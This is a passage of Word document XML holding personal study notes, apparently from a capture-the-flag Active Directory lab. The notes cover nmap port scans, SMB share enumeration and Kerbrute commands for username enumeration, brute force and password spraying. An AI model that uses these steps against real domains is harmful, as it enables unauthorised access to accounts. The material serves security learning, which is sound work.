        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9F4234" w14:textId="24E82DA9" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Also be aware of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2C7C44" w14:textId="1BB05ABD" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RuntimeBroker.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795D2E2" w14:textId="4DCBE409" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>taskhostw.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F8113A" w14:textId="1448F146" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00292F5A" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.threathunting.se/tag/windows-process/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1428624D" w14:textId="7B00EE24" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00292F5A" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.sans.org/security-resources/posters/hunt-evil/165/download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="679E52B9" w14:textId="0C842B12" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00292F5A" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/sysinternals/resources/windows-internals</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A7AFE29" w14:textId="6B7537C5" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA4D7BB" w14:textId="1C2530E1" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00D40A25" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Attacktive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D0D8BD" w14:textId="08EEC96B" w:rsidR="00D40A25" w:rsidRPr="0084205E" w:rsidRDefault="00E07F31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> scan IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB1BE33" w14:textId="24A5391E" w:rsidR="00E07F31" w:rsidRPr="0084205E" w:rsidRDefault="00E07F31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718CF888" w14:textId="571EAD4A" w:rsidR="00E07F31" w:rsidRPr="0084205E" w:rsidRDefault="00E07F31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -A &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEAC12E" w14:textId="0E8679B5" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F7CF59" w14:textId="2C8F598E" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">139 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>netbios-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="126B7647" w14:textId="4584846B" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>445 – Microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8DFB5" w14:textId="1C5D2EEE" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>53 – DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82B99C" w14:textId="2979152C" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>135 – SMB/RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252E0FD4" w14:textId="6DF4A307" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RDP into DC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2DC5F" w14:textId="6BD019C2" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>3389 - sometimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF82F4A" w14:textId="666F1AB5" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Certain ports being present indicate Domain Controller is present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F60896A" w14:textId="7C6982D1" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>88 – Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9DD025" w14:textId="19C9630E" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>389 – LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38E017" w14:textId="34DDC27E" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>636 – LDAPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4332A982" w14:textId="3A7B2893" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>enum4linux to enumerate ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D07036" w14:textId="48094DDA" w:rsidR="004E5F5C" w:rsidRPr="0084205E" w:rsidRDefault="004E5F5C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -L </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\\\&lt;ip&gt;\\</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13F75A0F" w14:textId="3C12557C" w:rsidR="004E5F5C" w:rsidRPr="0084205E" w:rsidRDefault="004E5F5C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>check for shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8E7BA3" w14:textId="1830CBFF" w:rsidR="00A051DA" w:rsidRPr="0084205E" w:rsidRDefault="00A051DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TLD</w:t>
      </w:r>
      <w:r w:rsidR="004E5F5C" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> (top level domain)</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for Active Directory Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230EA6DE" w14:textId="3CD8D69E" w:rsidR="004E5F5C" w:rsidRPr="0084205E" w:rsidRDefault="004E5F5C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>.local</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, .org, .com, .net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4607BDA3" w14:textId="65AE4370" w:rsidR="00E07F31" w:rsidRPr="0084205E" w:rsidRDefault="00E07F31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Installing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerbrute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="695E09EF" w14:textId="737AA47D" w:rsidR="004E5F5C" w:rsidRPr="0084205E" w:rsidRDefault="004E5F5C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Having </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ID’d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Kerberos – 88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD6589" w14:textId="1FB49CB5" w:rsidR="004E5F5C" w:rsidRPr="0084205E" w:rsidRDefault="004E5F5C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>brute force discovery of users, passwords, and password spray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEC8CF0" w14:textId="46368845" w:rsidR="004E5F5C" w:rsidRPr="0084205E" w:rsidRDefault="004E5F5C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>not recommended to brute force credentials due to account lockout policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351687F9" w14:textId="2B63C08F" w:rsidR="004E5F5C" w:rsidRPr="0084205E" w:rsidRDefault="004E5F5C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>userenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD472A" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>enumeration of valid usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDEEB2B" w14:textId="2CD60D4F" w:rsidR="00AD472A" w:rsidRPr="0084205E" w:rsidRDefault="00AD472A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bruteuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> a single </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> password from a wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC961E6" w14:textId="489ED492" w:rsidR="00AD472A" w:rsidRPr="0084205E" w:rsidRDefault="00AD472A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – read </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>username:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> combos from a file or stdin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104DC759" w14:textId="31BF4C1E" w:rsidR="00AD472A" w:rsidRPr="0084205E" w:rsidRDefault="00AD472A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>passwordspray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – test a single password against a list of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D7F424" w14:textId="57890CB8" w:rsidR="00AD472A" w:rsidRPr="0084205E" w:rsidRDefault="00AD472A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>must specify domain (-d) or domain controller (- -dc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB9CE14" w14:textId="6CFDD261" w:rsidR="00AD472A" w:rsidRPr="0084205E" w:rsidRDefault="00AD472A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>- -safe option prevents account lockouts if encountered once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607CD47D" w14:textId="2CCD10D7" w:rsidR="00815A7E" w:rsidRPr="0084205E" w:rsidRDefault="00815A7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>in directory where files are located that possess usernames and passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520BDFC5" w14:textId="0FFF5697" w:rsidR="00815A7E" w:rsidRPr="0084205E" w:rsidRDefault="00815A7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kerbrute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>userenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -d &lt;domain&gt; - -dc &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
